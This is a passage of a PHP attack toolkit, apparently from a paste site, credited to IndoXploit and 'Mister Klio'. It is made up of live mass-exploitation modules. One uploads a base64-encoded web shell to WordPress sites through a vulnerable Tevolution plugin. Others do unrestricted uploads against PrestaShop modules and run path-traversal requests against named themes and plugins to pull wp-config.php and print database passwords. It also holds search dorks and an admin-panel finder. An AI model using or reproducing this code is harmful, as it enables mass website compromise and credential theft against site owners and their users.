  767. <input type='submit' name='exp' value='Upload' class='button'>
  768. </form>
  769. <?php
  770. // IndoXploit
  771. set_time_limit(0);
  772. error_reporting(0);
  773.  
  774. function buffer() {
  775. ob_flush();
  776. flush();
  777. }
  778. function curl($url, $payload) {
  779. $ch = curl_init();
  780. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  781. curl_setopt($ch, CURLOPT_URL, $url);
  782. curl_setopt($ch, CURLOPT_POST, true);
  783. curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
  784. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  785. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  786. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  787. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  788. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  789. curl_setopt($ch, CURLOPT_HEADER, 0);
  790. curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  791. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  792. $res = curl_exec($ch);
  793. curl_close($ch);
  794. return $res;
  795. }
  796. $file = htmlspecialchars($_POST['filename']);
  797. $site = explode("\r\n", $_POST['url']);
  798. $do = $_POST['exp'];
  799. $uploader = base64_decode("PD9waHANCmVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4Jz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPg0KPC9mb3JtPiI7DQppZigkX1BPU1RbJ3VwbG9hZCddKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snaWR4J11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2lkeCddWyduYW1lJ10pKSB7DQoJZWNobyAic3Vrc2VzIjsNCgl9IGVsc2Ugew0KCWVjaG8gImdhZ2FsIjsNCgl9DQp9DQo/Pg==");
  800. if($do) {
  801. $y = date("Y");
  802. $m = date("m");
  803. $idx_dir = mkdir("Mk_only", 0755);
  804. $shell = "Mk_only/".$file;
  805. $fopen = fopen($shell, "w");
  806. fwrite($fopen, $uploader);
  807. fclose($fopen);
  808. foreach($site as $url) {
  809. $target = $url.'/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/uploadfile.php';
  810. $cek_shell = "$url/wp-content/uploads/$y/$m/$file";
  811. $data = array(
  812. "Filedata" => "@$shell"
  813. );
  814. $curl = curl($target, $data);
  815. if($curl) {
  816. $cek = file_get_contents($cek_shell);
  817. if(preg_match("/Auto Xploiter/is", $cek)) {
  818. echo "<a href='$cek_shell' target='_blank'>$cek_shell</a> -> shellmu<br>";
  819. }
  820. }
  821. buffer();
  822. }
  823. }
  824. exit;
  825. }
  826. ?>
  827. <?php
  828. if ($_GET['uploadimages'] == 'Done!') {
  829. @session_start();
  830. @error_reporting(0);
  831. @ini_set('error_log',NULL);
  832. @ini_set('log_errors',0);
  833. @ini_set('display_errors', 0);
  834. @set_time_limit(0);
  835.  
  836. echo"<br><center><a Style='font-size:30px;color:#ededed;'> Modules Upload Files (uploadimages)</a></center><center>
  837. <br>
  838. /uploadimages.php<br>
  839. Dork : /modules/simpleslideshow/<br>
  840. Dork : /modules/productpageadverts/<br>
  841. Dork : /modules/homepageadvertise/<br>
  842. Dork : /modules/columnadverts/<br>
  843.  
  844. <form method='post' class='header-izz'>
  845. Domain: <br><br>
  846. <textarea placeholder='http://www.target.com/' name='url' style='width: 350px; height:50px;' class='checkout-input'></textarea><br><br>
  847. <input type='submit' name='MK' value='Done!' class='button'>
  848. </form><br>";
  849. if($_POST['MK']) {
  850. $site = $_POST['url'];
  851. $file = "mk.html";
  852. echo "<br>Target : ".$site."<br>";
  853. $expl = array("/modules/simpleslideshow/","/modules/productpageadverts/","/modules/homepageadvertise/","/modules/columnadverts/","/modules/vtemslideshow/");
  854. foreach($expl as $exploit){
  855. $post = array("userfile" => "@$file",
  856. );
  857. $MK = $site.$exploit."/uploadimages.php";
  858. $ch2 = curl_init ($MK);
  859. curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
  860. curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
  861. curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
  862. curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
  863. curl_setopt ($ch2, CURLOPT_POST, 1);
  864. curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
  865. $data = curl_exec ($ch2);
  866. $Gets = $site.$exploit."/file_uploads/".$file;
  867. $MKget = @file_get_contents($Gets);
  868. if(preg_match('#MK#i',$MKget)){
  869. echo "<br> [#]Exploit Success :) <br>[#] ".$Gets."<br><hr><br>";
  870. }else{
  871. echo "<br>";}
  872. } }
  873. exit;
  874. }
  875. ?>
  876. <?php
  877. if ($_GET['Upload'] == 'Done!') {
  878. ?>
  879. <br><center><a Style='font-size:30px;color:#ededed;'>Exploit Upload Files (Functionns)</a></center><center>
  880. <br>
  881. <form method="post" class='header-izz'>
  882. Your Target : <br><br><input type="text" name="sites" size="10" value="http://target.mu/plugin/upload.php" class='checkout-input'><br>
  883. <br>Default Shell is Auto Created :<br><br> <input type="text" name="file" size="10" value="mk.php.xxxjpg" class='checkout-input'><br><br>
  884. <input name="conf" value="EXECUTE" type="submit" class='button'><br><br></form>
  885. </center>
  886. <?php
  887. $e=explode("\n",$_POST['sites']);
  888. $file = $_POST['file'];
  889. foreach($e as $sites){
  890. $post = array("files[]" => "@$file",
  891. );
  892. $ch2 = curl_init ($sites);
  893. curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
  894. curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
  895. curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
  896. curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
  897. curl_setopt ($ch2, CURLOPT_POST, 1);
  898. curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
  899. $data = curl_exec ($ch2);
  900. echo $data."\n\n\n";
  901. }
  902. exit;
  903. }
  904. ?>
  905. <?php
  906. if ($_GET['download'] == 'Done!') {
  907. ?>
  908. <br><center><a Style='font-size:30px;color:#ededed;'>Wordpress Auto Get Database (LFI)</a></center><center>
  909. <br>
  910. Dork : /download.php<br>
  911. Dork : /force-download.php?file=<br>
  912. Dork : /wp-download.php?download=<br>
  913. Dork : /download.php?download=<br>
  914. <form method='post' class='header-izz'>
  915. Domain: <br><br>
  916. <textarea placeholder='http://www.target.com/' name='sites' cols='45' rows='15' style='width: 350px; height:50px;' class='checkout-input'></textarea><br>
  917. <br><input value="EXECUTE" type="submit" class='button'><br><br>
  918. </form>
  919. <?php
  920. @set_time_limit(0);
  921. $sites = explode("\r\n", $_POST['sites']);
  922. foreach($sites as $site) {
  923. $site = trim($site);
  924.  
  925. $ch = curl_init();
  926. curl_setopt($ch, CURLOPT_URL, "$site");
  927. curl_setopt($ch, CURLOPT_HEADER, 1);
  928. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  929. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  930. $get = curl_exec($ch);
  931. curl_close($ch);
  932. if(preg_match("#WordPress (.*?)/>#", $get, $version)){
  933. $str = str_replace('/>', "", $version[0]);
  934. $str = str_replace('"', "", $str);
  935.  
  936. $users = @file_get_contents("$site/?author=1");
  937. preg_match('/<title>(.*?)<\/title>/si',$users,$user);
  938. $wpuser = explode('|',$user[1]);
  939.  
  940. echo "Site : ".$site."<br> Wp User : ".$wpuser[0]."<br> Version : ".$str."<br>"; }
  941. $expl = array("wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php","wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php","wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php","wp-content/themes/urbancity/lib/scripts/download.php?file=wp-config.php","wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php","wp-content/themes/acento/includes/view-pdf.php?download=1&file=../../../../wp-config.php","wp-content/force-download.php?file=../wp-config.php","wp-content/themes/lote27/download.php?download=../../../wp-config.php","wp-content/plugins/wp-custom-pages/wp-download.php?download=../../../wp-config.php");
  942. foreach($expl as $exploit){
  943. $ch = curl_init();
  944. curl_setopt($ch, CURLOPT_URL, "$site/$exploit");
  945. curl_setopt($ch, CURLOPT_HTTPGET, 1);
  946. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  947. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  948. $xp = curl_exec ($ch);
  949. curl_close($ch);
  950. if(preg_match("#DB_USER#i",$xp)){
  951. preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
  952. echo "DB_NAME:{$DB_NAME[1]}<br>";
  953. preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
  954. echo "DB_USER:{$DB_USER[1]}<br>";
  955. preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
  956. echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
  957. preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
  958. echo "DB_HOST:{$DB_HOST[1]}<br>";
  959. }
  960. }
  961. $lt = array("wp-content/themes/construct/lib/scripts/dl-skin.php","wp-content/themes/persuasion/lib/scripts/dl-skin.php","wp-content/themes/manbiz2/lib/scripts/dl-skin.php","wp-content/themes/method/lib/scripts/dl-skin.php","wp-content/themes/elegance/lib/scripts/dl-skin.php","wp-content/themes/modular/lib/scripts/dl-skin.php","wp-content/themes/myriad/lib/scripts/dl-skin.php","wp-content/themes/echelon/lib/scripts/dl-skin.php","wp-content/themes/fusion/lib/scripts/dl-skin.php","wp-content/themes/awake/lib/scripts/dl-skin.php","wp-content/themes/dejavu/lib/scripts/dl-skin.php");
  962. foreach($lt as $l){
  963. $site = "$site/$l";
  964. $process = curl_init($site);
  965. curl_setopt($process, CURLOPT_TIMEOUT, 30);
  966. curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)");
  967. curl_setopt($process, CURLOPT_HEADER, TRUE);
  968. curl_setopt($process, CURLOPT_POST, 1);
  969. curl_setopt($process, CURLOPT_POSTFIELDS, "_mysite_download_skin=../../../../../wp-config.php");
  970. curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
  971. curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
  972. $return = curl_exec($process);
  973. if(preg_match("#DB_USER#i",$return)){
  974. preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME);
  975. echo "DB_NAME:{$DB_NAME[1]}<br>";
  976. preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER);
  977. echo "DB_USER:{$DB_USER[1]}<br>";
  978. preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD);
  979. echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
  980. preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST);
  981. echo "DB_HOST:{$DB_HOST[1]}<br>";
  982. break;
  983. }
  984. }
  985. }
  986. exit;
  987. }
  988. ?>
  989. <?
  990. if ($_GET['mail-masta'] == 'Done!') {
  991. @session_start();
  992. @error_reporting(0);
  993. @ini_set('error_log',NULL);
  994. @ini_set('log_errors',0);
  995. @ini_set('display_errors', 0);
  996. @set_time_limit(0);
  997.  
  998. echo"<br><center><a Style='font-size:30px;color:#ededed;'>Wordpress Auto Get DataBase (AFD)</a></center><center>
  999. <br>
  1000. Dork : /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php <br>
  1001. Dork : /wp-content/plugins/mail-masta/inc/campaign/ <br>
  1002. <form method='post' class='header-izz'>
  1003. Domain: <br><br>
  1004. <textarea placeholder='http://www.target.com/' name='url' style='width: 350px; height:50px;' class='checkout-input'></textarea><br><br>
  1005. <input type='submit' name='MK' value='GET DB!' class='button'>
  1006. </form>";
  1007. $site = $_POST['url'];
  1008. if($_POST['MK']) {
  1009. echo "<br><b style='color:#ededed;'>TARGET : </b>".$site."<br><br>";
  1010. echo "<br><b style='color:#ededed;'>SCAN FINISH : </b><br>";
  1011. $expl = array("/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=../wp-config.php","/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=../../wp-config.php","/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=../../../wp-config.php","/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=../../../../wp-config.php","/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=../../../../../wp-config.php");
  1012. foreach($expl as $exploit){
  1013. $ch = curl_init();
  1014. curl_setopt($ch, CURLOPT_URL, "$site/$exploit");
  1015. curl_setopt($ch, CURLOPT_HTTPGET, 1);
  1016. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  1017. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  1018. $xp = curl_exec ($ch);
  1019. curl_close($ch);
  1020. if(preg_match("#DB_USER#i",$xp)){
  1021. preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
  1022. echo "DB_NAME:{$DB_NAME[1]}<br>";
  1023. preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
  1024. echo "DB_USER:{$DB_USER[1]}<br>";
  1025. preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
  1026. echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
  1027. preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
  1028. echo "DB_HOST:{$DB_HOST[1]}<br>";
  1029. }
  1030. }
  1031. }
  1032. exit;
  1033. }
  1034.  
  1035. /////
  1036. if ($_GET['forcedownload'] == 'Done!') {
  1037. @session_start();
  1038. @error_reporting(0);
  1039. @ini_set('error_log',NULL);
  1040. @ini_set('log_errors',0);
  1041. @ini_set('display_errors', 0);
  1042. @set_time_limit(0);
  1043.  
  1044. echo"<br><center><a Style='font-size:30px;color:#ededed;'>WordPress Get Database | RB-Agency </a></center><center>
  1045. <br>
  1046. Dork : /wp-content/plugins/rb-agency/ext/forcedownload.php?file=<br>
  1047. Dork : /forcedownload.php?file=<br>
  1048. <form method='post' class='header-izz'>
  1049. Domain: <br><br>
  1050. <textarea placeholder='http://www.target.com/' name='url' style='width: 350px; height:50px;' class='checkout-input'></textarea><br><br>
  1051. <input type='submit' name='MK' value='GET DB!' class='button'>
  1052. </form>";
  1053. $site = $_POST['url'];
  1054. if($_POST['MK']) {
  1055. echo "<br><b style='color:#ededed;'>TARGET : </b>".$site."<br><br>";
  1056. echo "<br><b style='color:#ededed;'>SCAN FINISH : </b><br>";
  1057. $expl = array("/wp-content/plugins/rb-agency/ext/
  1058. forcedownload.php?file=../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../../../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../../../wp-config.php");
  1059. foreach($expl as $exploit){
  1060. $ch = curl_init();
  1061. curl_setopt($ch, CURLOPT_URL, "$site/$exploit");
  1062. curl_setopt($ch, CURLOPT_HTTPGET, 1);
  1063. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  1064. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  1065. $xp = curl_exec ($ch);
  1066. curl_close($ch);
  1067. if(preg_match("#DB_USER#i",$xp)){
  1068. preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
  1069. echo "<b style='color:black;'>DB_NAME: </b>{$DB_NAME[1]}<br>";
  1070. preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
  1071. echo "<b style='color:black;'> DB_USER: </b>{$DB_USER[1]}<br>";
  1072. preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
  1073. echo "<b style='color:black;'> DB_PASSWORD: </b>{$DB_PASSWORD[1]}<br>";
  1074. preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
  1075. echo "<b style='color:black;'> DB_HOST: </b>{$DB_HOST[1]}<br>";
  1076. }
  1077. }
  1078. }
  1079. }
  1080. ?>
  1081. <?
  1082. if ($_GET['Finder'] == 'Done!') {
  1083. ?>
  1084. <center>
  1085. <br><center><a Style="font-size:30px;color:#ededed;">Finder Admins Havij 1.152 Pro </a></center>
  1086. <center><br> Finder Admins Havij 1.152 Pro v2.1
  1087. <br> Coded By Mister Klio
  1088. <center><form action ="" method="post" class="header-izz">
  1089. <center>Paste your target :</center><br><br>
  1090. <center><input type="text" name="site" alt="username" value="<?php echo "".$_SERVER['HTTP_HOST']."";?>" class="checkout-input"></center><br>
  1091. <center><input type = "submit" value="FIND" class="button"></center>
  1092. <?php
  1093. $site = $_POST['site'];
  1094. $list = array(
  1095. '/phpmyadmin/','/upload.php/','/admin.%EXT%/','/login.htm/','/login.html/','/login/','/login.%EXT%/','/adm/','/admin/','/admin/account.html/','/admin/login.html/','/admin/login.htm/','/admin/home.%EXT%/','/admin/controlpanel.html/','/admin/controlpanel.htm/','/admin/cp.%EXT%/','/admin/adminLogin.html/','/admin/adminLogin.htm/','/admin/admin_login.%EXT%/','/admin/controlpanel.%EXT%/','/admin/admin-login.%EXT%/','/admin-login.%EXT%/','/admin/account.%EXT%/','/admin/admin.%EXT%/','/admin.htm/','/admin.html/','/adminitem/','/adminitem.%EXT%/','/adminitems/','/adminitems.%EXT%/','/administrator/','/administrator/login.%EXT%/','/administrator.%EXT%/','/administration/','/administration.%EXT%/','/adminLogin/','/adminlogin.%EXT%/','/admin_area/admin.%EXT%/','/admin_area/','/admin_area/login.%EXT%/','/manager/','/manager.%EXT%/','/letmein/','/letmein.%EXT%/','/superuser/','/superuser.%EXT%/','/access/','/access.%EXT%/','/sysadm/','/sysadm.%EXT%/','/superman/','/supervisor/','/panel.%EXT%/','/control/','/control.%EXT%/','/member/','/member.%EXT%/','/members/','/members.%EXT%/','/user/','/user.%EXT%/','/cp/','/uvpanel/','/manage/','/manage.%EXT%/','/management/','/management.%EXT%/','/signin/','/signin.%EXT%/','/log-in/','/log-in.%EXT%/','/log_in/','/log_in.%EXT%/','/sign_in/','/sign_in.%EXT%/','/sign-in/','/sign-in.%EXT%/','/users/','/users.%EXT%/','/accounts/','/accounts.%EXT%/','/wp-login.php/','/bb-admin/login.%EXT%/','/bb-admin/admin.%EXT%/','/bb-admin/admin.html/','/administrator/account.%EXT%/','/relogin.htm/','/relogin.html/','/check.%EXT%/','/relogin.%EXT%/','/blog/wp-login.%EXT%/','/user/admin.%EXT%/','/users/admin.%EXT%/','/registration/','/processlogin.%EXT%/','/checklogin.%EXT%/','/checkuser.%EXT%/','/checkadmin.%EXT%/','/isadmin.%EXT%/','/authenticate.%EXT%/','/authentication.%EXT%/','/auth.%EXT%/','/authuser.%EXT%/','/authadmin.%EXT%/','/cp.%EXT%/','/modelsearch/login.%EXT%/','/moderator.%EXT%/','/moderator/','/controlpanel/','/controlpanel.%EXT%/','/admincontrol.%EXT%/','/adminpanel.%EXT%/','/fileadmin/','/fileadmin.%EXT%/','/sysadmin.%EXT%/','/admin1.%EXT%/','/admin1.html/','/admin1.htm/','/admin2.%EXT%/','/admin2.html/','/yonetim.%EXT%/','/yonetim.html/','/yonetici.%EXT%/','/yonetici.html/','/phpmyadmin/','/myadmin/','/ur-admin.%EXT%/','/ur-admin/','/Server.%EXT%/','/Server/','/wp-admin/','/administr8.%EXT%/','/administr8/','/webadmin/','/webadmin.%EXT%/','/administratie/','/admins/','/admins.%EXT%/','/administrivia/','/Database_Administration/','/useradmin/','/sysadmins/','/admin1/','/system-administration/','/administrators/','/pgadmin/','/directadmin/','/staradmin/','/ServerAdministrator/','/SysAdmin/','/administer/','/LiveUser_Admin/','/sys-admin/','/typo3/','/panel/','/cpanel/','/cpanel_file/','/platz_login/','/rcLogin/','/blogindex/','/formslogin/','/autologin/','/support_login/','/meta_login/','/manuallogin/','/simpleLogin/','/loginflat/','/utility_login/','/showlogin/','/memlogin/','/login-redirect/','/sub-login/','/wp-login/','/login1/','/dir-login/','/login_db/','/xlogin/','/smblogin/','/customer_login/','/UserLogin/','/login-us/','/acct_login/','/bigadmin/','/project-admins/','/phppgadmin/','/pureadmin/','/sql-admin/','/radmind/','/openvpnadmin/','/wizmysqladmin/','/vadmind/','/ezsqliteadmin/','/hpwebjetadmin/','/newsadmin/','/adminpro/','/Lotus_Domino_Admin/','/bbadmin/','/vmailadmin/','/Indy_admin/','/ccp14admin/','/irc-macadmin/','/banneradmin/','/sshadmin/','/phpldapadmin/','/macadmin/','/administratoraccounts/','/admin4_account/','/admin4_colon/','/radmind-1/','/Super-Admin/','/AdminTools/','/cmsadmin/','/SysAdmin2/','/globes_admin/','/cadmins/','/phpSQLiteAdmin/','/navSiteAdmin/','/server_admin_small/','/logo_sysadmin/','/power_user/','/system_administration/','/ss_vms_admin_sm/','/bb-admin/','/panel-administracion/','/instadmin/','/memberadmin/','/administratorlogin/','/adm.%EXT%/','/admin_login.%EXT%/','/panel-administracion/login.%EXT%/','/pages/admin/admin-login.%EXT%/','/pages/admin/','/acceso.%EXT%/','/admincp/login.%EXT%/','/admincp/','/adminarea/','/admincontrol/','/affiliate.%EXT%/','/adm_auth.%EXT%/','/memberadmin.%EXT%/','/administratorlogin.%EXT%/','/modules/admin/','/administrators.%EXT%/','/siteadmin/','/siteadmin.%EXT%/','/adminsite/','/kpanel/','/vorod/','/vorod.%EXT%/','/vorud/','/vorud.%EXT%/','/adminpanel/','/PSUser/','/secure/','/webmaster/','/webmaster.%EXT%/','/autologin.%EXT%/','/userlogin.%EXT%/','/admin_area.%EXT%/','/cmsadmin.%EXT%/','/security/','/usr/','/root/','/secret/','/admin/login.%EXT%/','/admin/adminLogin.%EXT%/','/moderator.php/','/moderator.html/','/moderator/login.%EXT%/','/moderator/admin.%EXT%/','/yonetici.%EXT%/','/0admin/','/0manager/','/aadmin/','/cgi-bin/login%EXT%/','/login1%EXT%/','/login_admin/','/login_admin%EXT%/','/login_out/','/login_out%EXT%/','/login_user%EXT%/','/loginerror/','/loginok/','/loginsave/','/loginsuper/','/loginsuper%EXT%/','/login%EXT%/','/logout/','/logout%EXT%/','/secrets/','/super1/','/super1%EXT%/','/super_index%EXT%/','/super_login%EXT%/','/supermanager%EXT%/','/superman%EXT%/','/superuser%EXT%/','/supervise/','/supervise/Login%EXT%/','/super%EXT%/',
  1096. );
  1097. if(isset($site)){
  1098. foreach($list as $path => $test) {
  1099. $ch = curl_init();
  1100. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1101. curl_setopt($ch, CURLOPT_HEADER, 1);
  1102. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36");
  1103. curl_setopt($ch, CURLOPT_URL, $site.$test);
  1104. $result = curl_exec($ch);
  1105. curl_close($ch);
  1106. //print $url;
  1107. if (preg_match("/200 OK/", $result)){
  1108. echo "<br><span style='color:#0078FF;'><b> Done ! </b></span><br><textarea class='checkout-input'>$site$test</textarea> ";
  1109. } else
  1110. if (preg_match("/401 Unauthorized/", $result)) {
  1111. echo "<br><span style='color:#0078FF;'><b>Done ! </b></span><br><textarea class='checkout-input'>$site$test</textarea> ";
  1112. }
  1113. }
  1114. echo "<br><br><span style='color:red;'>SCAN FINISHED </span><br><br></form>";
  1115. exit;
  1116. }
  1117. }
  1118. exit;
  1119. ?>
  1120.  
  1121. </body>
  1122. </html>
Add Comment
Please, Sign In to add comment